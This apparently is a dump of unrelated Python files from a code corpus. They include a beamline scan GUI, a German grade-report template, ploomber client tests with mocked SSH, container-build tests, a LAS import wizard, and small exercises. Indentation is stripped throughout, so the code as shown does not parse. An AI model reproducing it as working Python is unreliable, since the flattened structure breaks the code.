self.settings.setValue('step_xanes_dwell', step_xanes_dwell)
step_exafs_dwell = self.edit_exafs_dwell.text()
self.settings.setValue('step_exafs_dwell', step_exafs_dwell)
step_exafs_dwell_kpower_index = self.comboBox_exafs_dwell_kpower.currentIndex()
self.settings.setValue('step_exafs_dwell_kpower_index', step_exafs_dwell_kpower_index)
def addCanvas(self):
self.figure = Figure()
self.figure.set_facecolor(color='#FcF9F6')
self.canvas = FigureCanvas(self.figure)
self.figure.ax1 = self.figure.add_subplot(111)
self.figure.ax2 = self.figure.ax1.twinx()
self.figure.ax3 = self.figure.ax1.twinx()
self.toolbar = NavigationToolbar(self.canvas, self, coordinates=True)
self.plots.addWidget(self.toolbar)
self.plots.addWidget(self.canvas)
self.figure.ax3.grid(alpha = 0.4)
self.canvas.draw_idle()
def run_test_scan(self):
name = self.parameter_values[0].text()
repeats = self.parameter_values[2].value()
self.parameter_values[0].setText(f'test {name}')
self.parameter_values[2].setValue(1)
self.run_scan()
self.parameter_values[0].setText(name)
self.parameter_values[2].setValue(repeats)
def run_scan(self):
ignore_shutter = False
energy_grid = []
time_grid = []
for shutter in [self.shutter_dictionary[shutter] for shutter in self.shutter_dictionary if
self.shutter_dictionary[shutter].shutter_type != 'SP']:
if type(shutter.state) == str:
isclosed = (shutter.state == 'closed')
else:
isclosed = (shutter.state.value == 1)
if isclosed:
ret = question_message_box(self, 'Shutter closed',
'Would you like to run the scan with the shutter closed?')
if not ret:
print('Aborted!')
return False
ignore_shutter = True
break
name_provided = self.parameter_values[0].text()
if name_provided:
timenow = datetime.datetime.now()
print('\nStarting scan at {}'.format(timenow.strftime("%H:%M:%S"),flush='true'))
start_scan_timer=timer()
# Get parameters from the widgets and organize them in a dictionary (run_params)
run_parameters = return_parameters_from_widget(self.parameter_descriptions,self.parameter_values,
self.parameter_types)
# Run the scan using the dict created before
self.run_mode_uids = []
self.parent.run_mode = 'run'
plan_key = self.comboBox_scan_type.currentText()
if plan_key.lower().startswith('step scan'):
update_figure([self.figure.ax2, self.figure.ax1, self.figure.ax3], self.toolbar, self.canvas)
print(f'E0 {self.e0}')
energy_grid, time_grid = generate_energy_grid(float(self.e0),
float(self.edit_preedge_start.text()),
float(self.edit_xanes_start.text()),
float(self.edit_xanes_end.text()),
float(self.edit_exafs_end.text()),
float(self.edit_preedge_spacing.text()),
float(self.edit_xanes_spacing.text()),
float(self.edit_exafs_spacing.text()),
float(self.edit_preedge_dwell.text()),
float(self.edit_xanes_dwell.text()),
float(self.edit_exafs_dwell.text()),
int(self.comboBox_exafs_dwell_kpower.currentText())
)
plan_func = self.plan_funcs[plan_key]
_scanning_motor = 'hhm'
try:
self.pil100k = self.detector_dict['Pilatus 100k']['device'].stats1.total
if 'emission' in plan_key.lower():
label = 'XES'
_scanning_motor = 'emission'
LivePlotPilatus = XASPlot(self.pil100k.name, self.apb.ch1_mean.name, label, self.motor_dictionary['motor_emission']['object'].energy.name,
log=False, ax=self.figure.ax1, color='k', legend_keys=[label])
else:
label = 'HERFD'
LivePlotPilatus = XASPlot(self.pil100k.name, self.apb.ch1_mean.name, label, self.hhm[0].energy.name,
log=False, ax=self.figure.ax1, color='k', legend_keys=[label])
except:
LivePlotPilatus = None
try:
_xs = self.detector_dict['Xspress3']['device'].channel1.rois.roi01.value
_xs_at = self.detector_dict['Xspress3']['device'].settings.acquire_time
# self.motor_dictionary['motor_emission']['name']
LivePlotXspress3 = XASPlot(_xs.name, self.apb.ch1_mean.name, 'SDD', self.hhm[0].energy.name,
log=False, ax=self.figure.ax1, color='m', legend_keys=['SDD ch1-roi1'])
except:
LivePlotXspress3 = None
if _scanning_motor == 'hhm':
LivePlots = [
XASPlot(self.apb.ch1_mean.name, self.apb.ch2_mean.name, 'Transmission', self.hhm[0].energy.name,
log=True, ax=self.figure.ax1, color='b', legend_keys=['Transmission']),
XASPlot(self.apb.ch2_mean.name, self.apb.ch3_mean.name, 'Reference', self.hhm[0].energy.name,
log=True, ax=self.figure.ax1, color='r', legend_keys=['Reference']),
XASPlot(self.apb.ch4_mean.name, self.apb.ch1_mean.name, 'Fluorescence', self.hhm[0].energy.name,
log=False, ax=self.figure.ax1, color='g', legend_keys=['Fluorescence']),
]
else:
LivePlots = []
RE_args = [plan_func(**run_parameters,
ignore_shutter=ignore_shutter,
energy_grid=energy_grid,
time_grid=time_grid,
element=self.element,
e0=self.e0,
edge=self.edge,
ax=self.figure.ax1,
stdout=self.parent.emitstream_out)]
if plan_key.lower().endswith('pilatus'):
if LivePlotPilatus:
LivePlots.append(LivePlotPilatus)
if plan_key.lower().endswith('xspress 3'):
if LivePlotXspress3:
LivePlots.append(LivePlotXspress3)
if plan_key.lower().startswith('step scan'):
RE_args.append(LivePlots)
self._save_step_scan_settings()
self.run_mode_uids = self.RE(*RE_args)
timenow = datetime.datetime.now()
print('Scan complete at {}'.format(timenow.strftime("%H:%M:%S")))
stop_scan_timer=timer()
print('Scan duration {} s'.format(stop_scan_timer-start_scan_timer))
if self.rr_token is not None:
self.RE.unsubscribe(self.rr_token)
else:
message_box('Error', 'Please provide the name for the scan')
def populate_parameter_grid(self, index):
for i in range(len(self.parameter_values)):
self.gridLayout_parameters.removeWidget(self.parameter_values[i])
self.gridLayout_parameters.removeWidget(self.parameter_descriptions[i])
self.parameter_values[i].deleteLater()
self.parameter_descriptions[i].deleteLater()
plan_key = self.comboBox_scan_type.currentText()
plan_func = self.plan_funcs[plan_key]
[self.parameter_values, self.parameter_descriptions, self.parameter_types] = parse_plan_parameters(plan_func)
for i in range(len(self.parameter_values)):
self.gridLayout_parameters.addWidget(self.parameter_values[i], i, 0, QtCore.Qt.AlignTop)
self.gridLayout_parameters.addWidget(self.parameter_descriptions[i], i, 1, QtCore.Qt.AlignTop)
if plan_key.lower().startswith('step scan') and (not 'emission' in plan_key.lower()):
self.groupBox_stepscan.setEnabled(True)
else:
self.groupBox_stepscan.setEnabled(False)
if plan_key.lower().startswith('johann emission'):
motor_emission = self.motor_dictionary['motor_emission']['object']
if motor_emission._initialized:
self.push_run_scan.setEnabled(True)
self.push_run_test_scan.setEnabled(True)
self.parameter_values[4].setValue(motor_emission.energy.limits[0])
self.parameter_values[5].setValue(motor_emission.energy.limits[1])
else:
self.push_run_scan.setEnabled(False)
self.push_run_test_scan.setEnabled(False)
else:
self.push_run_scan.setEnabled(True)
self.push_run_test_scan.setEnabled(True)
def draw_interpolated_data(self, df):
update_figure([self.figure.ax2, self.figure.ax1, self.figure.ax3], self.toolbar, self.canvas)
if 'i0' in df and 'it' in df and 'energy' in df:
transmission = np.array(np.log(df['i0'] / df['it']))
if 'i0' in df and 'iff' in df and 'energy' in df:
fluorescence = np.array(df['iff'] / df['i0'])
if 'it' in df and 'ir' in df and 'energy' in df:
reference = np.array(np.log(df['it'] / df['ir']))
energy = np.array(df['energy'])
edge = int(len(energy) * 0.02)
#print(f'Before drawing in draw_interpolated_data:{__file__}')
self.figure.ax1.plot(energy[edge:-edge], transmission[edge:-edge], color='r', label='Transmission')
#print(f'After drawing in draw_interpolated_data:{__file__}')
self.figure.ax1.legend(loc=2)
self.figure.ax2.plot(energy[edge:-edge], fluorescence[edge:-edge], color='g', label='Total fluorescence')
self.figure.ax2.legend(loc=1)
self.figure.ax3.plot(energy[edge:-edge], reference[edge:-edge], color='b', label='Reference')
self.figure.ax3.legend(loc=3)
self.canvas.draw_idle()
def update_E0(self, text):
self.e0 = text
# print('saving settings')
self._save_step_scan_settings()
def update_edge(self, text):
# print(text)
self.edge = text
# self._save_step_scan_settings()
def update_element(self, text):
self.element = text
# self._save_step_scan_settings()
def get_info_from_autopilot(self):
sample_df = self.parent.widget_batch_mode.widget_autopilot.sample_df
sample_number = self.comboBox_autopilot_sample_number.currentIndex()
# name = sample_df.iloc[sample_number]['Sample label']
name = sample_df.iloc[sample_number]['Name']
comment = sample_df.iloc[sample_number]['Composition'] + ' ' + sample_df.iloc[sample_number]['Comment']
name = name.replace('/','_')
self.parameter_values[0].setText(name)
self.parameter_values[1].setText(comment)
| StarcoderdataPython |
6591183 | # -*- coding: utf-8 -*-
"""
local/grade_template.py
Last updated: 2021-03-29
Manage template-specific fields for grade reports.
=+LICENCE=============================
Copyright 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=-LICENCE========================================
"""
### Messages
_INVALID_RTYPE = "Ungültiger Zeugnistyp: '{rtype}'"
_INVALID_QUALI = "Ungültiges Qualifikationsfeld für Schüler {pid}: '{quali}'"
from core.base import Dates
from local.grade_config import GradeConfigError, STREAMS, GradeBase
VERSETZUNG_11_12 = "Durch Konferenzbeschluss vom {grades_d} in die" \
" Qualifikationsphase versetzt."
VERSETZUNG_12_13 = "Durch Konferenzbeschluss vom {grades_d} in die" \
" 13. Klasse versetzt."
QP12_TEXT = "hat den 12. Jahrgang der Qualifikationsphase vom {vom}" \
" bis zum {bis} besucht."
GS_TEXT = {
'HS': "Dieses Zeugnis ist dem Sekundarabschluss I – Hauptschulabschluss" \
" gleichgestellt. Es vermittelt die gleiche Berechtigung wie" \
" das Zeugnis über den Sekundarabschluss I – Hauptschulabschluss.",
'RS': "Dieses Zeugnis ist dem Sekundarabschluss I – Realschulabschluss" \
" gleichgestellt. Es vermittelt die gleiche Berechtigung wie" \
" das Zeugnis über den Sekundarabschluss I – Realschulabschluss.",
'Erw': "Dieses Zeugnis ist dem Erweiterten Sekundarabschluss I" \
" gleichgestellt. Es vermittelt die gleiche Berechtigung wie" \
" das Zeugnis über den Erweiterten Sekundarabschluss I."
}
SEKI_TEXT = {
'HS': "Sekundarabschluss I – Hauptschulabschluss",
'RS': "Sekundarabschluss I – Realschulabschluss",
'Erw': "Erweiterter Sekundarabschluss I"
}
_NOCOMMENT = '––––––––––'
def info_extend(grade_map):
def set_field(field):
"""If there is a configuration value for the given field, set it.
Return the "tag", if there is a "tag/" prefix, otherwise the value.
"""
try:
val = GradeBase.term_info(term, field)
except GradeConfigError:
return None
try:
tag, val = val.split('/', 1)
except ValueError:
tag = val
grade_map[field] = val
return tag
#
term = grade_map['TERM']
HJ = set_field('HJ')
stream = grade_map['STREAM']
grade_map['LEVEL'] = STREAMS[stream] # Only relevant for SekI
rtype = grade_map['REPORT_TYPE']
if rtype == 'Zeugnis':
if grade_map['SekII']:
grade_map['QP12'] = ''
if HJ == '2':
grade_map['QP12'] = QP12_TEXT.format(
vom = grade_map['QUALI_D'],
bis = grade_map['ISSUE_D'])
if grade_map['*Q'] == 'Erw':
# Versetzung 12.Gym -> 13.Gym
comment = grade_map['COMMENT']
newcomment = VERSETZUNG_12_13.format(
grades_d = grade_map['GRADES_D'])
if comment:
newcomment += '\n' + comment
grade_map['COMMENT'] = newcomment
else:
Z = set_field('Zeugnis')
if Z:
grade_map['ZEUGNIS'] = Z.upper()
# Versetzung 11.Gym -> 12.Gym
if (stream == 'Gym' and HJ == '2'
and grade_map['CLASS'] == '11'
and grade_map['*Q'] == '12'):
comment = grade_map['COMMENT']
newcomment = VERSETZUNG_11_12.format(
grades_d = grade_map['GRADES_D'])
if comment:
newcomment += '\n' + comment
grade_map['COMMENT'] = newcomment
grade_map['NOCOMMENT'] = '' if grade_map['COMMENT'] else _NOCOMMENT
elif rtype == 'Abschluss':
q = grade_map['*Q']
if q == 'Erw' and grade_map['CYEAR'] == '11':
q = 'RS' # 'Erw' not possible in class 11
try:
grade_map['SEKI'] = SEKI_TEXT[q] # SekI 'Abschluss' only
except KeyError as e:
raise GradeConfigError(_INVALID_QUALI.format(
pid = grade_map['PID'], quali = q or '')) from e
grade_map['NOCOMMENT'] = '' if grade_map['COMMENT'] else _NOCOMMENT
elif rtype == 'Abgang':
if grade_map['SekII']:
if grade_map['CYEAR'] == '12':
grade_map['QP12'] = QP12_TEXT.format(
vom = grade_map['QUALI_D'],
bis = grade_map['ISSUE_D'])
grade_map['GS'] = GS_TEXT['HS']
if HJ == '2':
try:
grade_map['GS'] = GS_TEXT[grade_map['*Q']]
except KeyError:
pass
else:
grade_map['GSVERMERK'] = ''
grade_map['GS'] = ''
# Gleichstellungsvermerk
klass = grade_map['CYEAR']
q = grade_map['*Q']
if (klass == '10' and HJ == '2') or klass in ('11', '12'):
if q in ('Erw', '12', 'RS', 'HS'):
grade_map['GS'] = GS_TEXT['HS'] # only HS-Abschluss
grade_map['GSVERMERK'] = "Gleichstellungsvermerk"
elif rtype in ('Abi', 'X', 'FHS'):
grade_map['FrHr'] = 'Herr' if grade_map['SEX'] == 'm' else 'Frau'
grade_map['FERTIG_D'] = Dates.print_date(grade_map['*F_D'])
elif rtype != 'Orientierung':
raise GradeConfigError(_INVALID_RTYPE.format(rtype = rtype))
grade_map['NOCOMMENT'] = '' if grade_map['COMMENT'] else _NOCOMMENT
| StarcoderdataPython |
9628677 | import subprocess
import sqlite3
import pickle
import copy
from pathlib import Path
from urllib.parse import urlparse
from unittest.mock import MagicMock, Mock
from subprocess import CalledProcessError
import paramiko
import pytest
from ploomber import DAG
from ploomber.tasks import ShellScript
from ploomber.products import File
from ploomber.clients import (ShellClient, SQLAlchemyClient, DBAPIClient,
RemoteShellClient)
from ploomber.clients import db, shell
def test_deepcopy_dbapiclient(tmp_directory):
client = DBAPIClient(sqlite3.connect, dict(database='my_db.db'))
client.execute('CREATE TABLE my_table (num INT)')
assert copy.deepcopy(client)
def test_pickle_dbapiclient(tmp_directory):
client = DBAPIClient(sqlite3.connect, dict(database='my_db.db'))
client.execute('CREATE TABLE my_table (num INT)')
assert pickle.dumps(client)
def test_dbapiclient_split_source(tmp_directory):
client = DBAPIClient(sqlite3.connect,
dict(database='my_db.db'),
split_source=';')
client.execute("""DROP TABLE IF EXISTS my_table;
CREATE TABLE my_table (num INT)""")
assert pickle.dumps(client)
def test_dbapiclient_split_source_custom_char(tmp_directory):
client = DBAPIClient(sqlite3.connect,
dict(database='my_db.db'),
split_source='##')
client.execute("""DROP TABLE IF EXISTS my_table##
CREATE TABLE my_table (num INT)""")
assert pickle.dumps(client)
def test_deepcopy_sqlalchemyclient(tmp_directory):
client = SQLAlchemyClient('sqlite:///my_db.db')
client.execute('CREATE TABLE my_table (num INT)')
assert copy.deepcopy(client)
def test_pickle_sqlalchemyclient(tmp_directory):
client = SQLAlchemyClient('sqlite:///my_db.db')
client.execute('CREATE TABLE my_table (num INT)')
assert pickle.dumps(client)
def test_custom_create_engine_kwargs(monkeypatch):
mock = Mock()
monkeypatch.setattr(db, 'create_engine', mock)
client = SQLAlchemyClient('sqlite:///my_db.db',
create_engine_kwargs=dict(key='value'))
# trigger call to create_engine
client.engine
mock.assert_called_once_with('sqlite:///my_db.db', key='value')
@pytest.mark.parametrize(
'code,split_source',
[['CREATE TABLE my_table (num INT); SELECT * FROM my_table', 'default'],
['CREATE TABLE my_table (num INT); SELECT * FROM my_table', ';'],
['CREATE TABLE my_table (num INT)## SELECT * FROM my_table', '##']])
def test_send_more_than_one_command_in_sqlite(code, split_source,
tmp_directory):
client = SQLAlchemyClient('sqlite:///my_db.db', split_source=split_source)
client.execute(code)
def test_safe_uri():
# with password
res = db.safe_uri(urlparse('postgresql://user:pass@localhost/db'))
assert res == 'postgresql://user:********@localhost/db'
# no password
res = db.safe_uri(urlparse('postgresql://user@localhost/db'))
assert res == 'postgresql://user@localhost/db'
# TODO: some of the following tests no longer need tmp_directory because
# they use mock and files are no longer created
@pytest.mark.parametrize('run_template', [None, 'ruby {{path_to_code}}'])
def test_shell_client_execute(run_template, tmp_directory, monkeypatch):
if run_template:
client = ShellClient(run_template=run_template)
expected_command = run_template.split(' ')[0]
else:
client = ShellClient()
expected_command = 'bash'
code = """
echo 'hello'
"""
mock_res = Mock()
mock_res.returncode = 0
mock_run_call = Mock(return_value=mock_res)
monkeypatch.setattr(shell.subprocess, 'run', mock_run_call)
# prevent tmp file from being removed so we can check contents
monkeypatch.setattr(shell.Path, 'unlink', Mock())
client.execute(code)
cmd, path = mock_run_call.call_args[0][0]
assert cmd == expected_command
assert Path(path).read_text() == code
def test_shell_client_tmp_file_is_deleted(tmp_directory, monkeypatch):
client = ShellClient()
code = """
echo 'hello'
"""
mock_unlink = Mock()
monkeypatch.setattr(shell.Path, 'unlink', mock_unlink)
mock_res = Mock()
mock_res.returncode = 0
mock_run_call = Mock(return_value=mock_res)
monkeypatch.setattr(shell.subprocess, 'run', mock_run_call)
client.execute(code)
mock_unlink.assert_called_once()
def test_task_level_shell_client(tmp_directory, monkeypatch):
path = Path(tmp_directory, 'a_file')
dag = DAG()
client = ShellClient(run_template='ruby {{path_to_code}}')
dag.clients[ShellScript] = client
ShellScript("""
require 'fileutils'
FileUtils.touch "{{product}}"
""",
product=File(path),
dag=dag,
name='ruby_script')
mock = Mock(wraps=client.execute)
monkeypatch.setattr(client, 'execute', mock)
mock_res = Mock()
mock_res.returncode = 0
def side_effect(*args, **kwargs):
Path('a_file').touch()
return mock_res
mock_run_call = Mock(side_effect=side_effect)
monkeypatch.setattr(shell.subprocess, 'run', mock_run_call)
# prevent tmp file from being removed so we can check contents
monkeypatch.setattr(shell.Path, 'unlink', Mock())
dag.build()
mock.assert_called_once()
cmd, path_arg = mock_run_call.call_args[0][0]
kwargs = mock_run_call.call_args[1]
expected_code = """
require 'fileutils'
FileUtils.touch "{path}"
""".format(path=path)
assert cmd == 'ruby'
assert Path(path_arg).read_text() == expected_code
assert kwargs == {
'stderr': subprocess.PIPE,
'stdout': subprocess.PIPE,
'shell': False
}
def test_db_code_split():
assert list(db.code_split('a;b;c;')) == ['a', 'b', 'c']
assert list(db.code_split('a;b;c;\n')) == ['a', 'b', 'c']
def test_remote_shell(monkeypatch):
fake_client = MagicMock(spec=paramiko.SSHClient)
stdout = MagicMock()
stdout.readline = lambda: ''
stdout.channel.recv_exit_status.return_value = 0
fake_client.exec_command.return_value = 'input', stdout, 'err'
sftp = MagicMock()
fake_client.open_sftp.return_value = sftp
monkeypatch.setattr(paramiko, 'SSHClient', lambda: fake_client)
client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
client.execute('some code')
fake_client.open_sftp.assert_called_once()
fake_client.exec_command.assert_called_once()
sftp.put.assert_called_once()
sftp.close.assert_called_once()
client.close()
fake_client.close.assert_called_once()
def test_remote_shell_error(monkeypatch):
fake_client = MagicMock(spec=paramiko.SSHClient)
stdout = MagicMock()
stdout.readline = lambda: ''
stdout.channel.recv_exit_status.return_value = 1
fake_client.exec_command.return_value = 'input', stdout, 'err'
sftp = MagicMock()
fake_client.open_sftp.return_value = sftp
monkeypatch.setattr(paramiko, 'SSHClient', lambda: fake_client)
client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
with pytest.raises(CalledProcessError):
client.execute('some code')
def test_remote_shell_read_file(monkeypatch, tmp_directory):
mock_ssh_client = Mock(spec=paramiko.SSHClient)
monkeypatch.setattr(shell, 'ssh_client_and_policy', lambda:
(mock_ssh_client, Mock()))
monkeypatch.setattr(shell.tempfile, 'mkstemp', lambda:
(None, 'my_tmp_file'))
monkeypatch.setattr(shell.os, 'close', lambda _: None)
mock_ssh_client.open_sftp().get.side_effect = lambda x, y: Path(
'my_tmp_file').write_text('some content')
# reset to prevent counting the "call" from the previous line
mock_ssh_client.open_sftp.reset_mock()
client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
returned_content = client.read_file('/path/to/remote/file')
assert returned_content == 'some content'
mock_ssh_client.open_sftp.assert_called_once()
ftp = client.connection.open_sftp()
assert ftp.get.call_args.assert_called_with('/path/to/remote/file',
'my_tmp_file')
ftp.close.assert_called_once()
def test_remote_shell_write_to_file(monkeypatch, tmp_directory):
mock_ssh_client = Mock(spec=paramiko.SSHClient)
monkeypatch.setattr(shell, 'ssh_client_and_policy', lambda:
(mock_ssh_client, Mock()))
monkeypatch.setattr(shell.tempfile, 'mkstemp', lambda:
(None, 'my_tmp_file'))
monkeypatch.setattr(shell.os, 'close', lambda _: None)
monkeypatch.setattr(shell.Path, 'unlink', lambda _: None)
client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
client.write_to_file('content', '/path/to/remote/file')
mock_ssh_client.open_sftp.assert_called_once()
ftp = client.connection.open_sftp()
assert Path('my_tmp_file').read_text() == 'content'
assert ftp.put.call_args.assert_called_with('my_tmp_file',
'/path/to/remote/file')
ftp.close.assert_called_once()
| StarcoderdataPython |
6668449 | from __future__ import unicode_literals
import sys
from PyQt4 import QtGui, QtCore
from PyQt4.QtCore import Qt
from PyQt4.QtGui import (QComboBox, QDialog, QTableWidgetItem, QTableWidget, QWizard)
#import lasio.pylasdev.las_reader
import logging
import sqlite3
import totaldepth.PlotLogs
import inout.las.reader.ui.logtablemodel as logtablemodel
from db.databasemanager import DM
from db.core.well.well import Well
from inout.las.reader.lasreader import LasReader
from inout.las.reader.ui.notepad import Notepad
from statics.types.logtype import LogType
from statics.types.logunitstype import LogUnitsType
from inout.las.reader.ui.wizard.ui_importlaswizard import Ui_Wizard
from inout.las.reader.ui.wizard.importlaswizardpage import ImportLasWizardPage
from inout.las.reader.ui.wizard.welllaswizardpage import WellLasWizardPage
from inout.las.reader.ui.wizard.logservicewizardpage import LogServiceWizardPage
from inout.las.reader.ui.wizard.parameterlaswizardpage import ParameterLasWizardPage
from inout.las.reader.orm.laspersister import LasPersister
logger = logging.getLogger('console')
class ImportLasWizard(QWizard, Ui_Wizard):
'''Wizard for importing logs from .las file'''
_wellExistsInDB = bool()
def __init__(self, fileName, parent=None):
logger.debug("__init__() "+str(fileName))
super(ImportLasWizard, self).__init__(parent)
self.setObjectName("importLasWizard")
#default wizard anyway
#self.setupUi(self)
#holder for radio button selection state -instead of registerField
self._importAllData = False
self._wellExistsInDB = False
#if error saving an object quit wizard
self._errorOnSave = False
self._reader = LasReader()
self._fileName = fileName
self._session = DM.getSession()
self.checkIfWellExistsInDB()
self.setWindowTitle("Import .las data wizard")
self.resize(640,480)
#slot handling the next button, but disconnect the default slot first
#see http://stackoverflow.com/questions/11155494/handling-cancellation-on-a-wizard-page
#self.disconnect(self.button(QWizard.NextButton), QtCore.SIGNAL('clicked()'), self, QtCore.SLOT('next()'))
if fileName is not None:
#plotter=totaldepth.PlotLogs
#plotter.mockPlot()
self.readFile()
#las_info = lasio.pylasdev.las_reader.read_las_file(str(fileName))
if len(self._reader.logList) == 0:
self.NextButton.setEnabled(False)
self.BackButton.setEnabled(False)
logger.info("Cannot populate dialog, log list is empty")
else:
self.addPage(ImportLasWizardPage(self._reader.logList, self))
self.addPage(WellLasWizardPage(self._reader.well, self))
self.addPage(LogServiceWizardPage(self._reader, self))
self.addPage(ParameterLasWizardPage(self._reader, self))
else:
logger.info("Cannot populate dialog, filename is empty")
self.connectSlots()
def readFile(self):
logger.debug(">>readFile()")
#start main ui progress bar to busy
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
ok = self._reader.readJobPart1(self._fileName)
ok = self._reader.readJobPart2()
ok = self._reader.readJobPart3()
QtGui.QApplication.restoreOverrideCursor()
#set main ui progress bar to finished then zero
#test
#logList = self._reader.logList
#for log in logList:
# logger.debug("--readFile(): "+str(log.name)+" "+str(log.type_)+" "+str(log.unit)+" "+str(log.fileUnit))
#logger.debug("--readFile(): "+str(self._fileName)+" well name: "+str(wellDTO.well_name))
#end test
def connectSlots(self):
logger.debug(">>connectSlots()")
self.button(QWizard.NextButton).clicked.connect(self.saveOnNext)
self.button(QWizard.FinishButton).clicked.connect(self.finishClicked)
def initializePage(self, i):
logger.debug( "Initializing page..." + str(i) )
def saveOnNext(self):
logger.debug( ">>saveOnNext()")
try:
#currentId has already been incremented when here
page = self.page(self.currentId()-1)
logger.debug(str("--saveOnNext() name: "+page.objectName()))
page.populateObject()
except:
logger.error( "Could not save page "+str(self.currentId()-1))
self._errorOnSave = True
def finishClicked(self):
logger.debug(">>finishClicked()")
#Save the finish page (Parameters atm)
try:
#Note that Id has not been incremented unlike Next
page = self.page(self.currentId())
logger.debug(str("--saveOnNext() name: "+page.objectName()))
page.populateObject()
#TODO start main ui progress bar to busy
lasPersister = LasPersister(self._session)
lasPersister.dispatchDataWriters(self._reader, True)
if lasPersister.committedOK:
#send signal for tree update
DM.databaseModified()
self._session.close()
except:
logger.error( "Could not save page "+str(self.currentId()))
self._errorOnSave = True
finally:
self._session.close()
def checkIfWellExistsInDB(self):
''' Need a well object in database before can query against child tables '''
try:
rs = self._session.query(Well, Well.id).all()
if rs:
self._wellExistsInDB = True
except sqlite3.OperationalError as e:
logger.error(str(e))
| StarcoderdataPython |
12832716 | # 023
# Ask the user to type in the first line of a nursery rhyme and display
# the length of the string. Ask for a starting number and an
# ending number and then display just that section of the text
# (remember Python starts counting from 0 and not 1).
rhyme = list()
while True:
try:
if not rhyme:
rhyme = input('Please enter the first line of a nursery '
'rhyme: ')
print(f'There are {len(rhyme)} characters in that line')
from_to = input('Please type in the starting character'
'you want to the final character: ')
from_to = from_to.split(' ')
for index, value in enumerate(from_to):
from_to[index] = int(value)
print(rhyme[from_to[0] - 1:from_to[1] + 1])
break
except Exception as e:
print(e)
| StarcoderdataPython |
8079317 | #655. Print Binary Tree
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def printTree(self, root):
if root is None:
return None
def maxDepth(node):
if node is None:
return 0
else:
leftDepth = maxDepth(node.left)
rightDepth = maxDepth(node.right)
depthIncludingNode = max(leftDepth, rightDepth)+1
return depthIncludingNode
height = maxDepth(root)-1
cols = pow(2, height+1)-1
res = [["" for _ in range(cols)] for _ in range(height+1)]
def dfs(node, row, col):
if node is None: return
res[int(row)][int(col)] = str(node.val)
dfs(node.left, row+1, (col - pow(2, height-row-1)))
dfs(node.right, row+1, (col+pow(2, height-row-1)))
dfs(root, 0, (cols-1)/2)
return res
"""
Given the root of a binary tree, construct a 0-indexed m x n string matrix res that represents a formatted layout of the tree. The formatted layout matrix should be constructed using the following rules:
The height of the tree is height and the number of rows m should be equal to height + 1.
The number of columns n should be equal to 2height+1 - 1.
Place the root node in the middle of the top row (more formally, at location res[0][(n-1)/2]).
For each node that has been placed in the matrix at position res[r][c], place its left child at res[r+1][c-2height-r-1] and its right child at res[r+1][c+2height-r-1].
Continue this process until all the nodes in the tree have been placed.
Any empty cells should contain the empty string "".
Return the constructed matrix res.
Input: root = [1,2]
Output:
[["","1",""],
["2","",""]]
Input: root = [1,2,3,null,4]
Output:
[["","","","1","","",""],
["","2","","","","3",""],
["","","4","","","",""]]
"""
| StarcoderdataPython |
3549879 | <filename>code/convert_to_record.py
import tensorflow as tf
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def data_to_record(data, label, writer):
h, w, c = data.shape
data_raw = data.tostring()
label_raw = label.tostring()
example = tf.train.Example(features=tf.train.Features(feature={
'height': _int64_feature(h),
'width': _int64_feature(w),
'depth': _int64_feature(c),
'label': _bytes_feature(label_raw),
'data': _bytes_feature(data_raw)
}))
writer.write(example.SerializeToString())
| StarcoderdataPython |
8091255 | import pytest
from matryoshka_tester.helpers import ContainerBuild
@pytest.mark.parametrize(
"dockerfile_build",
(
build.to_pytest_param()
for build in (
ContainerBuild(
name="amidst",
pre_build_steps=(
"git clone -b v4.6 "
"https://github.com/toolbox4minecraft/amidst"
),
),
ContainerBuild(
name="maven",
pre_build_steps=(
"git clone -b maven-3.8.1 https://github.com/apache/maven"
),
marks=pytest.mark.xfail(
reason="environment variables are not set correctly"
),
),
ContainerBuild(
name="pdftk",
pre_build_steps=(
"git clone -b v3.2.2 "
"https://gitlab.com/pdftk-java/pdftk.git"
),
),
ContainerBuild(
name="k3sup",
pre_build_steps=(
"git clone -b 0.10.2 https://github.com/alexellis/k3sup"
),
),
)
),
indirect=["dockerfile_build"],
)
def test_dockerfile_build(host, container_runtime, dockerfile_build):
cmd = host.run_expect([0], container_runtime.build_command)
img_id = container_runtime.get_image_id_from_stdout(cmd.stdout)
host.run_expect(
[0], f"{container_runtime.runner_binary} run --rm {img_id}"
)
| StarcoderdataPython |
6570318 | <gh_stars>0
"""
Language detection using n-grams
"""
import re
from math import log
from statistics import mean
# 4
def tokenize_by_sentence(text: str) -> tuple:
"""
Splits a text into sentences, sentences into tokens, tokens into letters
Tokens are framed with '_'
:param text: a text
:return: a tuple of sentence with tuples of tokens split into letters
e.g.
text = 'She is happy. He is happy.'
--> (
(('_', 's', 'h', 'e', '_'), ('_', 'i', 's', '_'), ('_', 'h', 'a', 'p', 'p', 'y', '_')),
(('_', 'h', 'e', '_'), ('_', 'i', 's', '_'), ('_', 'h', 'a', 'p', 'p', 'y', '_'))
)
"""
if not isinstance(text, str) or len(text) == 0:
return ()
sentences = re.split('[!?.] ', text)
list_letters = []
for sentence in sentences:
list_tokens = re.sub('[^a-z \n]', '', sentence.lower()).split()
if not list_tokens:
continue
list_letters.append(tuple(tuple(['_'] + list(token) + ['_']) for token in list_tokens))
return tuple(list_letters)
# 4
class LetterStorage:
def __init__(self):
self.storage = {}
def _put_letter(self, letter: str) -> int:
"""
Puts a letter into storage, assigns a unique id
:param letter: a letter
:return: 0 if succeeds, 1 if not
"""
if not isinstance(letter, str) or letter == '':
return 1
if letter not in self.storage:
self.storage[letter] = 1 + len(self.storage)
return 0
def get_id_by_letter(self, letter: str) -> int:
"""
Gets a unique id by a letter
:param letter: a letter
:return: an id
"""
